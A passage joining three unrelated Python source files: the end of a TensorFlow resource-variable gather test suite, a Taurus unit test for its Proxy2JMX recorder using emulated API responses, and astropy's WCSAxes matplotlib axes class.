batch_dims=4,
output_shape=[2, 3, 4, 5, 10, 7]
# = params.shape[:4] + indices.shape[4:] + params.shape[5:]
),
])
@test_util.run_in_graph_and_eager_modes
def testGatherWithBatchDimsMatchesTensor(self, params_shape, indices_shape,
batch_dims, output_shape):
"""Checks that gather with batch_dims returns the correct shape."""
# Generate a `params` tensor with the indicated shape.
params_size = np.prod(params_shape)
params = np.reshape(np.arange(params_size, dtype=np.int32), params_shape)
# Generate an `indices` tensor with the indicated shape, where each index
# is within the appropriate range.
indices_size = np.prod(indices_shape)
indices = np.reshape(np.arange(indices_size, dtype=np.int32), indices_shape)
indices = indices % params_shape[batch_dims]
var = resource_variable_ops.ResourceVariable(params, name="var0")
with ops.control_dependencies([var.initializer]):
expected = array_ops.gather(
var.read_value(), indices, batch_dims=batch_dims)
result = resource_variable_ops.resource_gather(
var.handle, indices, dtype=var.dtype, batch_dims=batch_dims)
self.assertAllEqual(output_shape, result.shape.as_list())
self.assertAllEqual(expected, result)
@parameterized.parameters([
dict(dtype=dtypes.bool),
dict(dtype=dtypes.int64),
dict(dtype=dtypes.half),
dict(dtype=dtypes.float32),
dict(dtype=dtypes.double),
])
@test_util.run_gpu_only
@test_util.run_in_graph_and_eager_modes
def testGatherWithDTypes(self, dtype):
if dtype == dtypes.bool:
params = constant_op.constant([False, True, False, True])
expected = constant_op.constant([[False, True], [False, True]])
else:
params = constant_op.constant([6, 7, 8, 9], dtype=dtype)
expected = constant_op.constant([[8, 7], [6, 9]], dtype=dtype)
indices = constant_op.constant([[2, 1], [0, 3]])
var = resource_variable_ops.ResourceVariable(params, name="var0")
with ops.control_dependencies([var.initializer]):
result = resource_variable_ops.resource_gather(
var.handle, indices, dtype=dtype)
self.assertAllEqual(expected, result)
@test_util.run_v2_only
def testUninitializedVariableMemoryUsage(self):
if test_util.is_gpu_available():
# TODO(allenl): Investigate possible GPU-specific memory leaks
self.skipTest("Disabled when a GPU is available")
# TODO(kkb): Python memory checker complains continuous `weakref`
# allocations, investigate.
if memory_checker.CppMemoryChecker is None:
self.skipTest("Requires the C++ memory checker")
def _create_and_delete_variable():
resource_variable_ops.UninitializedVariable(
shape=[100, 100],
dtype=dtypes.float32)
_create_and_delete_variable()
checker = memory_checker.CppMemoryChecker(
"ResourceVariableOps.testUninitializedVariableMemoryUsage")
for _ in range(2):
_create_and_delete_variable()
checker.record_snapshot()
checker.stop()
checker.report()
checker.assert_no_leak_if_all_possibly_except_one()
@test_util.run_v2_only
def testIterateVariable(self):
v = variables.Variable([1., 2.])
self.assertAllClose([1., 2.], list(iter(v)))
if __name__ == "__main__":
test.main()
|
|
import json
import os
import shutil
from os.path import join
from bzt import TaurusConfigError
from bzt.modules.proxy2jmx import Proxy2JMX, BZAProxy
from bzt.modules._selenium import SeleniumExecutor
from bzt.utils import is_windows, is_linux, get_full_path, RESOURCES_DIR
from tests.unit import BZTestCase, EngineEmul
class BZAProxyEmul(BZAProxy):
def __init__(self, service):
super(BZAProxyEmul, self).__init__()
self.service = service
def _request(self, url, data=None, headers=None, method=None, raw_result=False):
self.log.debug("Emulating: %s", url)
response = self.service.responses.pop(0)
resp = response.text
self.log.debug("Result: %s", resp)
if raw_result:
return resp
else:
return json.loads(resp) if len(resp) else {}
class Proxy2JMXEmul(Proxy2JMX):
responses = []
def __init__(self):
super(Proxy2JMXEmul, self).__init__()
self.proxy = BZAProxyEmul(self)
class ResponseEmul(object):
def __init__(self, status_code, text):
self.status_code = status_code
self.text = text
class TestProxy2JMX(BZTestCase):
def setUp(self):
super(TestProxy2JMX, self).setUp()
self.obj = Proxy2JMXEmul()
self.obj.engine = EngineEmul()
src = join(RESOURCES_DIR, 'chrome-loader.c')
dst_loader = join(RESOURCES_DIR, 'chrome-loader.exe')
shutil.copy2(src, dst_loader)
def tearDown(self):
dst_loader = join(RESOURCES_DIR, 'chrome-loader.exe')
os.remove(dst_loader)
super(TestProxy2JMX, self).tearDown()
def test_no_token(self):
self.obj.settings = self.obj.engine.config.get('recorder')
self.assertRaises(TaurusConfigError, self.obj.prepare)
def test_full(self):
self.obj.api_delay = 1
self.obj.responses = [
ResponseEmul(200, '{"result" : {}}'),
ResponseEmul(200, '{"result" : {"port": "port1", "host": "host1"}}'),
ResponseEmul(200, ''),
ResponseEmul(200, ''), # startup: startRecording
ResponseEmul(200, ''), # shutdown: stopRecording
ResponseEmul(200, '{"result" : "http://jmx_url"}'),
ResponseEmul(200, 'regular jmx contents'),
ResponseEmul(200, '{"result" : "http://smartjmx_url"}'),
ResponseEmul(200, 'smartjmx content')]
self.obj.engine.config.merge({
'modules': {
'recorder': {
'token': '123'}}})
self.obj.settings = self.obj.engine.config.get('modules').get('recorder')
executor = SeleniumExecutor()
self.obj.engine.provisioning.executors = [executor]
self.obj.prepare()
self.assertEqual(self.obj.proxy_addr, 'http://host1:port1')
self.obj.startup()
self.obj.shutdown()
self.obj.post_process()
with open(self.obj.engine.artifacts_dir + '/generated.smart.jmx') as fd:
lines = fd.readlines()
self.assertEqual(len(lines), 1)
self.assertEqual(lines[0].strip(), 'smartjmx content')
with open(self.obj.engine.artifacts_dir + '/generated.simple.jmx') as fd:
lines = fd.readlines()
self.assertEqual(len(lines), 1)
self.assertEqual(lines[0].strip(), 'regular jmx contents')
def test_existing_proxy(self):
self.obj.api_delay = 1
self.obj.responses = [
ResponseEmul(200,
'{"result" : {"port": "port1", "host": "host1", "status": "active"}}'),
ResponseEmul(200, ''), # stopRecording
ResponseEmul(200, '')] # clearRecording
self.obj.engine.config.merge({
'modules': {
'recorder': {
'token': '123'}}})
self.obj.settings = self.obj.engine.config.get('modules').get('recorder')
self.obj.prepare()
self.assertEqual(self.obj.proxy_addr, 'http://host1:port1')
def test_filename(self):
self.obj.api_delay = 1
self.obj.responses = [
ResponseEmul(200,
'{"result" : {"port": "port1", "host": "host1", "status": "active"}}'),
ResponseEmul(200, '1'), # stopRecording
ResponseEmul(200, '2'), # clearRecording
ResponseEmul(200, '{"result" : "http://jmx_url"}'),
ResponseEmul(200, 'regular jmx contents'),
ResponseEmul(200, '{"result" : "http://smartjmx_url"}'),
ResponseEmul(200, 'smartjmx content')
]
self.obj.engine.config.merge({'modules': {'recorder': {'token': '123'}}})
self.obj.settings = self.obj.engine.config.get('modules').get('recorder')
self.obj.parameters['simple-output'] = self.obj.engine.artifacts_dir + '/simple.jmx'
self.obj.parameters['smart-output'] = self.obj.engine.artifacts_dir + '/smart.jmx'
self.obj.prepare()
self.obj.post_process()
self.assertTrue(os.path.exists(self.obj.engine.artifacts_dir + "/smart.jmx"))
self.assertTrue(os.path.exists(self.obj.engine.artifacts_dir + "/simple.jmx"))
def _check_linux(self):
required_env = {
'DESKTOP_SESSION': None, 'HTTP_PROXY': 'http://host1:port1', 'https_proxy': 'http://host1:port1',
'GNOME_DESKTOP_SESSION_ID': None, 'http_proxy': 'http://host1:port1', 'XDG_CURRENT_DESKTOP': None,
'HTTPS_PROXY': 'http://host1:port1', 'CHROMIUM_USER_FLAGS': '--proxy-server=http://host1:port1',
'KDE_FULL_SESSION': None}
self.obj.startup()
real_env = self.obj.engine.provisioning.executors[0].env.get()
for key in required_env:
if required_env[key] is None:
self.assertNotIn(key, real_env)
else:
self.assertIn(key, real_env)
self.assertEqual(required_env[key], real_env[key], key)
def _check_windows(self):
art_dir = self.obj.engine.artifacts_dir
os.environ['LOCALAPPDATA'] = art_dir
os.mkdir(join(art_dir, 'Chromium'))
os.mkdir(join(art_dir, 'Chromium', 'Application'))
os.mkdir(join(art_dir, 'chromedriver'))
src = join(RESOURCES_DIR, 'chrome-loader.c')
dst_chrome = join(art_dir, 'Chromium', 'Application', 'chrome.exe')
dst_chromedriver = join(art_dir, 'chromedriver', 'chromedriver.exe')
shutil.copy2(src, dst_chrome)
shutil.copy2(src, dst_chromedriver)
required_env = {
'PATH_TO_CHROME': dst_chrome,
'ADDITIONAL_CHROME_PARAMS': '--proxy-server="http://host1:port1"',
'CHROME_LOADER_LOG': join(self.obj.engine.artifacts_dir, 'chrome-loader.log')}
os.environ['PATH'] = join(art_dir, 'chromedriver') + os.pathsep + os.getenv('PATH')
self.obj.startup()
loader_dir = set(os.listdir(join(art_dir, 'chrome-loader')))
self.assertEqual(loader_dir, {'chrome.exe', 'chromedriver.exe'})
required_env = {str(key.upper()): str(required_env[key]) for key in required_env}
real_env = self.obj.engine.provisioning.executors[0].env.get()
real_env = {str(key.upper()): str(real_env[key]) for key in real_env}
self.assertTrue(real_env["PATH"].startswith(join(self.obj.engine.artifacts_dir, "chrome-loader")))
for key in required_env:
self.assertIn(key, real_env)
self.assertEqual(required_env[key], real_env[key])
def _check_mac(self):
self.obj.startup()
self.assertIn("Your system doesn't support settings of proxy", self.log_recorder.warn_buff.getvalue())
def test_chrome_proxy(self):
self.obj.responses = [
ResponseEmul(200, '{"result" : {}}'),
ResponseEmul(200, '{"result" : {"port": "port1", "host": "host1"}}'),
ResponseEmul(200, ''),
ResponseEmul(200, ''), # startup: startRecording
ResponseEmul(200, ''), # shutdown: stopRecording
ResponseEmul(200, '{"result" : "http://jmx_url"}'),
ResponseEmul(200, 'regular jmx contents'),
ResponseEmul(200, '{"result" : "http://smartjmx_url"}'),
ResponseEmul(200, 'smartjmx content')]
self.obj.engine.config.merge({
'modules': {
'recorder': {
'token': '123'}}})
self.obj.settings = self.obj.engine.config.get('modules').get('recorder')
self.sniff_log(self.obj.log)
executor = SeleniumExecutor()
self.obj.engine.provisioning.executors = [executor]
self.obj.prepare()
if is_linux():
self._check_linux()
elif is_windows():
self._check_windows()
else: # MacOS
self._check_mac()
self.obj.shutdown()
self.obj.post_process()
|
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
from functools import partial
from collections import defaultdict
import numpy as np
from matplotlib import rcParams
from matplotlib.artist import Artist
from matplotlib.axes import Axes, subplot_class_factory
from matplotlib.transforms import Affine2D, Bbox, Transform
import astropy.units as u
from astropy.coordinates import SkyCoord, BaseCoordinateFrame
from astropy.wcs import WCS
from astropy.wcs.wcsapi import BaseHighLevelWCS
from .transforms import CoordinateTransform
from .coordinates_map import CoordinatesMap
from .utils import get_coord_meta, transform_contour_set_inplace
from .frame import RectangularFrame, RectangularFrame1D
from .wcsapi import IDENTITY, transform_coord_meta_from_wcs
__all__ = ['WCSAxes', 'WCSAxesSubplot']
VISUAL_PROPERTIES = ['facecolor', 'edgecolor', 'linewidth', 'alpha', 'linestyle']
class _WCSAxesArtist(Artist):
"""This is a dummy artist to enforce the correct z-order of axis ticks,
tick labels, and gridlines.
FIXME: This is a bit of a hack. ``Axes.draw`` sorts the artists by zorder
and then renders them in sequence. For normal Matplotlib axes, the ticks,
tick labels, and gridlines are included in this list of artists and hence
are automatically drawn in the correct order. However, ``WCSAxes`` disables
the native ticks, labels, and gridlines. Instead, ``WCSAxes.draw`` renders
ersatz ticks, labels, and gridlines by explicitly calling the functions
``CoordinateHelper._draw_ticks``, ``CoordinateHelper._draw_grid``, etc.
This hack would not be necessary if ``WCSAxes`` drew ticks, tick labels,
and gridlines in the standary way."""
def draw(self, renderer, *args, **kwargs):
self.axes.draw_wcsaxes(renderer)
class WCSAxes(Axes):
"""
The main axes class that can be used to show world coordinates from a WCS.
Parameters
----------
fig : `~matplotlib.figure.Figure`
The figure to add the axes to
rect : list
The position of the axes in the figure in relative units. Should be
given as ``[left, bottom, width, height]``.
wcs : :class:`~astropy.wcs.WCS`, optional
The WCS for the data. If this is specified, ``transform`` cannot be
specified.
transform : `~matplotlib.transforms.Transform`, optional
The transform for the data. If this is specified, ``wcs`` cannot be
specified.
coord_meta : dict, optional
A dictionary providing additional metadata when ``transform`` is
specified. This should include the keys ``type``, ``wrap``, and
``unit``. Each of these should be a list with as many items as the
dimension of the WCS. The ``type`` entries should be one of
``longitude``, ``latitude``, or ``scalar``, the ``wrap`` entries should
give, for the longitude, the angle at which the coordinate wraps (and
`None` otherwise), and the ``unit`` should give the unit of the
coordinates as :class:`~astropy.units.Unit` instances. This can
optionally also include a ``format_unit`` entry giving the units to use
for the tick labels (if not specified, this defaults to ``unit``).
transData : `~matplotlib.transforms.Transform`, optional
Can be used to override the default data -> pixel mapping.
slices : tuple, optional
For WCS transformations with more than two dimensions, we need to
choose which dimensions are being shown in the 2D image. The slice
should contain one ``x`` entry, one ``y`` entry, and the rest of the
values should be integers indicating the slice through the data. The
order of the items in the slice should be the same as the order of the
dimensions in the :class:`~astropy.wcs.WCS`, and the opposite of the
order of the dimensions in Numpy. For example, ``(50, 'x', 'y')`` means
that the first WCS dimension (last Numpy dimension) will be sliced at
an index of 50, the second WCS and Numpy dimension will be shown on the
x axis, and the final WCS dimension (first Numpy dimension) will be
shown on the y-axis (and therefore the data will be plotted using
``data[:, :, 50].transpose()``)
frame_class : type, optional
The class for the frame, which should be a subclass of
:class:`~astropy.visualization.wcsaxes.frame.BaseFrame`. The default is to use a
:class:`~astropy.visualization.wcsaxes.frame.RectangularFrame`
"""
def __init__(self, fig, rect, wcs=None, transform=None, coord_meta=None,
transData=None, slices=None, frame_class=None,
**kwargs):
"""
"""
super().__init__(fig, rect, **kwargs)
self._bboxes = []
if frame_class is not None:
self.frame_class = frame_class
elif (wcs is not None and (wcs.pixel_n_dim == 1 or
(slices is not None and 'y' not in slices))):
self.frame_class = RectangularFrame1D
else:
self.frame_class = RectangularFrame
if not (transData is None):
# User wants to override the transform for the final
# data->pixel mapping
self.transData = transData
self.reset_wcs(wcs=wcs, slices=slices, transform=transform, coord_meta=coord_meta)
self._hide_parent_artists()
self.format_coord = self._display_world_coords
self._display_coords_index = 0
fig.canvas.mpl_connect('key_press_event', self._set_cursor_prefs)
self.patch = self.coords.frame.patch
self._wcsaxesartist = _WCSAxesArtist()
self.add_artist(self._wcsaxesartist)
self._drawn = False
def _display_world_coords(self, x, y):
if not self._drawn:
return ""
if self._display_coords_index == -1:
return f"{x} {y} (pixel)"
pixel = np.array([x, y])
coords = self._all_coords[self._display_coords_index]
world = coords._transform.transform(np.array([pixel]))[0]
coord_strings = []
for idx, coord in enumerate(coords):
if coord.coord_index is not None:
coord_strings.append(coord.format_coord(world[coord.coord_index], format='ascii'))
coord_string = ' '.join(coord_strings)
if self._display_coords_index == 0:
system = "world"
else:
system = f"world, overlay {self._display_coords_index}"
coord_string = f"{coord_string} ({system})"
return coord_string
def _set_cursor_prefs(self, event, **kwargs):
if event.key == 'w':
self._display_coords_index += 1
if self._display_coords_index + 1 > len(self._all_coords):
self._display_coords_index = -1
def _hide_parent_artists(self):
# Turn off spines and current axes
for s in self.spines.values():
s.set_visible(False)
self.xaxis.set_visible(False)
if self.frame_class is not RectangularFrame1D:
self.yaxis.set_visible(False)
# We now overload ``imshow`` because we need to make sure that origin is
# set to ``lower`` for all images, which means that we need to flip RGB
# images.
def imshow(self, X, *args, **kwargs):
"""
Wrapper to Matplotlib's :meth:`~matplotlib.axes.Axes.imshow`.
If an RGB image is passed as a PIL object, it will be flipped
vertically and ``origin`` will be set to ``lower``, since WCS
transformations - like FITS files - assume that the origin is the lower
left pixel of the image (whereas RGB images have the origin in the top
left).
All arguments are passed to :meth:`~matplotlib.axes.Axes.imshow`.
"""
origin = kwargs.pop('origin', 'lower')
# plt.imshow passes origin as None, which we should default to lower.
if origin is None:
origin = 'lower'
elif origin == 'upper':
raise ValueError("Cannot use images with origin='upper' in WCSAxes.")
# To check whether the image is a PIL image we can check if the data
# has a 'getpixel' attribute - this is what Matplotlib's AxesImage does
try:
from PIL.Image import Image, FLIP_TOP_BOTTOM
except ImportError:
# We don't need to worry since PIL is not installed, so user cannot
# have passed RGB image.
pass
else:
if isinstance(X, Image) or hasattr(X, 'getpixel'):
X = X.transpose(FLIP_TOP_BOTTOM)
return super().imshow(X, *args, origin=origin, **kwargs)
def contour(self, *args, **kwargs):
"""
Plot contours.
This is a custom implementation of :meth:`~matplotlib.axes.Axes.contour`
which applies the transform (if specified) to all contours in one go for
performance rather than to each contour line individually. All
positional and keyword arguments are the same as for
:meth:`~matplotlib.axes.Axes.contour`.
"""
# In Matplotlib, when calling contour() with a transform, each
# individual path in the contour map is transformed separately. However,
# this is much too slow for us since each call to the transforms results
# in an Astropy coordinate transformation, which has a non-negligible
# overhead - therefore a better approach is to override contour(), call
# the Matplotlib one with no transform, then apply the transform in one
# go to all the segments that make up the contour map.
transform = kwargs.pop('transform', None)
cset = super().contour(*args, **kwargs)
if transform is not None:
# The transform passed to self.contour will normally include
# a transData component at the end, but we can remove that since
# we are already working in data space.
transform = transform - self.transData
transform_contour_set_inplace(cset, transform)
return cset
def contourf(self, *args, **kwargs):
"""
Plot filled contours.
This is a custom implementation of :meth:`~matplotlib.axes.Axes.contourf`
which applies the transform (if specified) to all contours in one go for
performance rather than to each contour line individually. All
positional and keyword arguments are the same as for
:meth:`~matplotlib.axes.Axes.contourf`.
"""
# See notes for contour above.
transform = kwargs.pop('transform', None)
cset = super().contourf(*args, **kwargs)
if transform is not None:
# The transform passed to self.contour will normally include
# a transData component at the end, but we can remove that since
# we are already working in data space.
transform = transform - self.transData
transform_contour_set_inplace(cset, transform)
return cset
def plot_coord(self, *args, **kwargs):
"""
Plot `~astropy.coordinates.SkyCoord` or
`~astropy.coordinates.BaseCoordinateFrame` objects onto the axes.
The first argument to
:meth:`~astropy.visualization.wcsaxes.WCSAxes.plot_coord` should be a
coordinate, which will then be converted to the first two parameters to
`matplotlib.axes.Axes.plot`. All other arguments are the same as
`matplotlib.axes.Axes.plot`. If not specified a ``transform`` keyword
argument will be created based on the coordinate.
Parameters
----------
coordinate : `~astropy.coordinates.SkyCoord` or `~astropy.coordinates.BaseCoordinateFrame`
The coordinate object to plot on the axes. This is converted to the
first two arguments to `matplotlib.axes.Axes.plot`.
See Also
--------
matplotlib.axes.Axes.plot : This method is called from this function with all arguments passed to it.
"""
if isinstance(args[0], (SkyCoord, BaseCoordinateFrame)):
# Extract the frame from the first argument.
frame0 = args[0]
if isinstance(frame0, SkyCoord):
frame0 = frame0.frame
native_frame = self._transform_pixel2world.frame_out
# Transform to the native frame of the plot
frame0 = frame0.transform_to(native_frame)
plot_data = []
for coord in self.coords:
if coord.coord_type == 'longitude':
plot_data.append(frame0.spherical.lon.to_value(u.deg))
elif coord.coord_type == 'latitude':
plot_data.append(frame0.spherical.lat.to_value(u.deg))
else:
raise NotImplementedError("Coordinates cannot be plotted with this "
"method because the WCS does not represent longitude/latitude.")
if 'transform' in kwargs.keys():
raise TypeError("The 'transform' keyword argument is not allowed,"
" as it is automatically determined by the input coordinate frame.")
transform = self.get_transform(native_frame)
kwargs.update({'transform': transform})
args = tuple(plot_data) + args[1:]
return super().plot(*args, **kwargs)
def reset_wcs(self, wcs=None, slices=None, transform=None, coord_meta=None):
"""
Reset the current Axes, to use a new WCS object.
"""
# Here determine all the coordinate axes that should be shown.
if wcs is None and transform is None:
self.wcs = IDENTITY
else:
# We now force call 'set', which ensures the WCS object is
# consistent, which will only be important if the WCS has been set
# by hand. For example if the user sets a celestial WCS by hand and
# forgets to set the units, WCS.wcs.set() will do this.
if wcs is not None:
# Check if the WCS object is an instance of `astropy.wcs.WCS`
# This check is necessary as only `astropy.wcs.WCS` supports
# wcs.set() method
if isinstance(wcs, WCS):
wcs.wcs.set()
if isinstance(wcs, BaseHighLevelWCS):
wcs = wcs.low_level_wcs
self.wcs = wcs
# If we are making a new WCS, we need to preserve the path object since
# it may already be used by objects that have been plotted, and we need
# to continue updating it. CoordinatesMap will create a new frame
# instance, but we can tell that instance to keep using the old path.
if hasattr(self, 'coords'):
previous_frame = {'path': self.coords.frame._path,
'color': self.coords.frame.get_color(),
'linewidth': self.coords.frame.get_linewidth()}
else:
previous_frame = {'path': None}
if self.wcs is not None:
transform, coord_meta = transform_coord_meta_from_wcs(self.wcs, self.frame_class, slices=slices)
self.coords = CoordinatesMap(self,
transform=transform,
coord_meta=coord_meta,
frame_class=self.frame_class,
previous_frame_path=previous_frame['path'])
self._transform_pixel2world = transform
if previous_frame['path'] is not None:
self.coords.frame.set_color(previous_frame['color'])
self.coords.frame.set_linewidth(previous_frame['linewidth'])
self._all_coords = [self.coords]
# Common default settings for Rectangular Frame
for ind, pos in enumerate(coord_meta.get('default_axislabel_position', ['b', 'l'])):
self.coords[ind].set_axislabel_position(pos)
for ind, pos in enumerate(coord_meta.get('default_ticklabel_position', ['b', 'l'])):
self.coords[ind].set_ticklabel_position(pos)
for ind, pos in enumerate(coord_meta.get('default_ticks_position', ['bltr', 'bltr'])):
self.coords[ind].set_ticks_position(pos)
if rcParams['axes.grid']:
self.grid()
def draw_wcsaxes(self, renderer):
if not self.axison:
return
# Here need to find out range of all coordinates, and update range for
# each coordinate axis. For now, just assume it covers the whole sky.
self._bboxes = []
# This generates a structure like [coords][axis] = [...]
ticklabels_bbox = defaultdict(partial(defaultdict, list))
ticks_locs = defaultdict(partial(defaultdict, list))
visible_ticks = []
for coords in self._all_coords:
coords.frame.update()
for coord in coords:
coord._draw_grid(renderer)
for coords in self._all_coords:
for coord in coords:
coord._draw_ticks(renderer, bboxes=self._bboxes,
ticklabels_bbox=ticklabels_bbox[coord],
ticks_locs=ticks_locs[coord])
visible_ticks.extend(coord.ticklabels.get_visible_axes())
for coords in self._all_coords:
for coord in coords:
coord._draw_axislabels(renderer, bboxes=self._bboxes,
ticklabels_bbox=ticklabels_bbox,
ticks_locs=ticks_locs[coord],
visible_ticks=visible_ticks)
self.coords.frame.draw(renderer)
def draw(self, renderer, inframe=False):
# In Axes.draw, the following code can result in the xlim and ylim
# values changing, so we need to force call this here to make sure that
# the limits are correct before we update the patch.
locator = self.get_axes_locator()
if locator:
pos = locator(self, renderer)
self.apply_aspect(pos)
else:
self.apply_aspect()
if self._axisbelow is True:
self._wcsaxesartist.set_zorder(0.5)
elif self._axisbelow is False:
self._wcsaxesartist.set_zorder(2.5)
else:
# 'line': above patches, below lines
self._wcsaxesartist.set_zorder(1.5)
# We need to make sure that that frame path is up to date
self.coords.frame._update_patch_path()
super().draw(renderer, inframe=inframe)
self._drawn = True
# MATPLOTLIB_LT_30: The ``kwargs.pop('label', None)`` is to ensure
# compatibility with Matplotlib 2.x (which has label) and 3.x (which has
# xlabel). While these are meant to be a single positional argument,
# Matplotlib internally sometimes specifies e.g. set_xlabel(xlabel=...).
def set_xlabel(self, xlabel=None, labelpad=1, **kwargs):
if xlabel is None:
xlabel = kwargs.pop('label', None)
if xlabel is None:
raise TypeError("set_xlabel() missing 1 required positional argument: 'xlabel'")
for coord in self.coords:
if 'b' in coord.axislabels.get_visible_axes():
coord.set_axislabel(xlabel, minpad=labelpad, **kwargs)
break
def set_ylabel(self, ylabel=None, labelpad=1, **kwargs):
if ylabel is None:
ylabel = kwargs.pop('label', None)
if ylabel is None:
raise TypeError("set_ylabel() missing 1 required positional argument: 'ylabel'")
if self.frame_class is RectangularFrame1D:
return super().set_ylabel(ylabel, labelpad=labelpad, **kwargs)
for coord in self.coords:
if 'l' in coord.axislabels.get_visible_axes():
coord.set_axislabel(ylabel, minpad=labelpad, **kwargs)
break
def get_xlabel(self):
for coord in self.coords:
if 'b' in coord.axislabels.get_visible_axes():
return coord.get_axislabel()
def get_ylabel(self):
if self.frame_class is RectangularFrame1D:
return super().get_ylabel()
for coord in self.coords:
if 'l' in coord.axislabels.get_visible_axes():
return coord.get_axislabel()
def get_coords_overlay(self, frame, coord_meta=None):
# Here we can't use get_transform because that deals with
# pixel-to-pixel transformations when passing a WCS object.
if isinstance(frame, WCS):
transform, coord_meta = transform_coord_meta_from_wcs(frame, self.frame_class)
else:
transform = self._get_transform_no_transdata(frame)
if coord_meta is None:
coord_meta = get_coord_meta(frame)
coords = CoordinatesMap(self, transform=transform,
coord_meta=coord_meta,
frame_class=self.frame_class)
self._all_coords.append(coords)
# Common settings for overlay
coords[0].set_axislabel_position('t')
coords[1].set_axislabel_position('r')
coords[0].set_ticklabel_position('t')
coords[1].set_ticklabel_position('r')
self.overlay_coords = coords
return coords
def get_transform(self, frame):
"""
Return a transform from the specified frame to display coordinates.
This does not include the transData transformation
Parameters
----------
frame : :class:`~astropy.wcs.WCS` or :class:`~matplotlib.transforms.Transform` or str
The ``frame`` parameter can have several possible types:
* :class:`~astropy.wcs.WCS` instance: assumed to be a
transformation from pixel to world coordinates, where the
world coordinates are the same as those in the WCS
transformation used for this ``WCSAxes`` instance. This is
used for example to show contours, since this involves
plotting an array in pixel coordinates that are not the
final data coordinate and have to be transformed to the
common world coordinate system first.
* :class:`~matplotlib.transforms.Transform` instance: it is
assumed to be a transform to the world coordinates that are
part of the WCS used to instantiate this ``WCSAxes``
instance.
* ``'pixel'`` or ``'world'``: return a transformation that
allows users to plot in pixel/data coordinates (essentially
an identity transform) and ``world`` (the default
world-to-pixel transformation used to instantiate the
``WCSAxes`` instance).
* ``'fk5'`` or ``'galactic'``: return a transformation from
the specified frame to the pixel/data coordinates.
* :class:`~astropy.coordinates.BaseCoordinateFrame` instance.
"""
return self._get_transform_no_transdata(frame).inverted() + self.transData
def _get_transform_no_transdata(self, frame):
"""
Return a transform from data to the specified frame
"""
if isinstance(frame, WCS):
transform, coord_meta = transform_coord_meta_from_wcs(frame, self.frame_class)
transform_world2pixel = transform.inverted()
if self._transform_pixel2world.frame_out == transform_world2pixel.frame_in:
return self._transform_pixel2world + transform_world2pixel
else:
return (self._transform_pixel2world +
CoordinateTransform(self._transform_pixel2world.frame_out,
transform_world2pixel.frame_in) +
transform_world2pixel)
elif frame == 'pixel':
return Affine2D()
elif isinstance(frame, Transform):
return self._transform_pixel2world + frame
else:
if frame == 'world':
return self._transform_pixel2world
else:
coordinate_transform = CoordinateTransform(self._transform_pixel2world.frame_out, frame)
if coordinate_transform.same_frames:
return self._transform_pixel2world
else:
return self._transform_pixel2world + coordinate_transform
def get_tightbbox(self, renderer, *args, **kwargs):
# FIXME: we should determine what to do with the extra arguments here.
# Note that the expected signature of this method is different in
# Matplotlib 3.x compared to 2.x.
if not self.get_visible():
return
bb = [b for b in self._bboxes if b and (b.width != 0 or b.height != 0)]
if bb:
_bbox = Bbox.union(bb)
return _bbox
else:
return self.get_window_extent(renderer)
def grid(self, b=None, axis='both', *, which='major', **kwargs):
"""
Plot gridlines for both coordinates.
Standard matplotlib appearance options (color, alpha, etc.) can be
passed as keyword arguments. This behaves like `matplotlib.axes.Axes`
except that if no arguments are specified, the grid is shown rather
than toggled.
Parameters
----------
b : bool
Whether to show the gridlines.
"""
if not hasattr(self, 'coords'):
return
if which != 'major':
raise NotImplementedError('Plotting the grid for the minor ticks is '
'not supported.')
if axis == 'both':
self.coords.grid(draw_grid=b, **kwargs)
elif axis == 'x':
self.coords[0].grid(draw_grid=b, **kwargs)
elif axis == 'y':
self.coords[1].grid(draw_grid=b, **kwargs)
else:
raise ValueError('axis should be one of x/y/both')
def tick_params(self, axis='both', **kwargs):
"""
Method to set the tick and tick label parameters in the same way as the
:meth:`~matplotlib.axes.Axes.tick_params` method in Matplotlib.
This is provided for convenience, but the recommended API is to use
:meth:`~astropy.visualization.wcsaxes.CoordinateHelper.set_ticks`,
:meth:`~astropy.visualization.wcsaxes.CoordinateHelper.set_ticklabel`,
:meth:`~astropy.visualization.wcsaxes.CoordinateHelper.set_ticks_position`,
:meth:`~astropy.visualization.wcsaxes.CoordinateHelper.set_ticklabel_position`,
and :meth:`~astropy.visualization.wcsaxes.CoordinateHelper.grid`.
Parameters
----------
axis : int or str, optional
Which axis to apply the parameters to. This defaults to 'both'
but this can also be set to an `int` or `str` that refers to the
axis to apply it to, following the valid values that can index
``ax.coords``. Note that ``'x'`` and ``'y``' are also accepted in
the case of rectangular axes.
which : {'both', 'major', 'minor'}, optional
Which ticks to apply the settings to. By default, setting are
applied to both major and minor ticks. Note that if ``'minor'`` is
specified, only the length of the ticks can be set currently.
direction : {'in', 'out'}, optional
Puts ticks inside the axes, or outside the axes.
length : float, optional
Tick length in points.
width : float, optional
Tick width in points.
color : color, optional
Tick color (accepts any valid Matplotlib color)
pad : float, optional
Distance in points between tick and label.
labelsize : float or str, optional
Tick label font size in points or as a string (e.g., 'large').
labelcolor : color, optional
Tick label color (accepts any valid Matplotlib color)
colors : color, optional
Changes the tick color and the label color to the same value
(accepts any valid Matplotlib color).
bottom, top, left, right : bool, optional
Where to draw the ticks. Note that this can only be given if a
specific coordinate is specified via the ``axis`` argument, and it
will not work correctly if the frame is not rectangular.
labelbottom, labeltop, labelleft, labelright : bool, optional
Where to draw the tick labels. Note that this can only be given if a
specific coordinate is specified via the ``axis`` argument, and it
will not work correctly if the frame is not rectangular.
grid_color : color, optional
The color of the grid lines (accepts any valid Matplotlib color).
grid_alpha : float, optional
Transparency of grid lines: 0 (transparent) to 1 (opaque).
grid_linewidth : float, optional
Width of grid lines in points.
grid_linestyle : str, optional
The style of the grid lines (accepts any valid Matplotlib line
style).
"""
if not hasattr(self, 'coords'):
# Axes haven't been fully initialized yet, so just ignore, as
# Axes.__init__ calls this method
return
if axis == 'both':
for pos in ('bottom', 'left', 'top', 'right'):
if pos in kwargs:
raise ValueError(f"Cannot specify {pos}= when axis='both'")
if 'label' + pos in kwargs:
raise ValueError(f"Cannot specify label{pos}= when axis='both'")
for coord in self.coords:
coord.tick_params(**kwargs)
elif axis in self.coords:
self.coords[axis].tick_params(**kwargs)
elif axis in ('x', 'y') and self.frame_class is RectangularFrame:
spine = 'b' if axis == 'x' else 'l'
for coord in self.coords:
if spine in coord.axislabels.get_visible_axes():
coord.tick_params(**kwargs)
# In the following, we put the generated subplot class in a temporary class and
# we then inherit it - if we don't do this, the generated class appears to
# belong in matplotlib, not in WCSAxes, from the API's point of view.
class WCSAxesSubplot(subplot_class_factory(WCSAxes)):
"""
A subclass class for WCSAxes
"""
pass
|
Subsets and Splits
